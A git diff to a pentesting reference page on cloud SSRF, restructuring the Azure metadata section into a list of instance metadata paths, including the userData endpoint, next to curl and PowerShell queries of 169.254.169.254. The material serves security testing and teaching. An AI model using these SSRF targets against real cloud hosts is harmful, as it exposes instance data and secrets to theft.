diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index 788e01cb2..19d9e2b7d 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -298,12 +298,15 @@ Documentation available at [`https://metadata.packet.net/userdata`](https://meta * Must **not** contain an `X-Forwarded-For` header ```powershell -http://169.254.169.254/metadata/instance?api-version=2017-04-02 -http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text # Powershell Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -NoProxy -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | ConvertTo-Json -Depth 64 # Linux curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | jq + +# Paths +/metadata/instance?api-version=2017-04-02 +/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text +/metadata/instance/compute/userData?api-version=2021-01-01&format=text ``` ### Azure Apps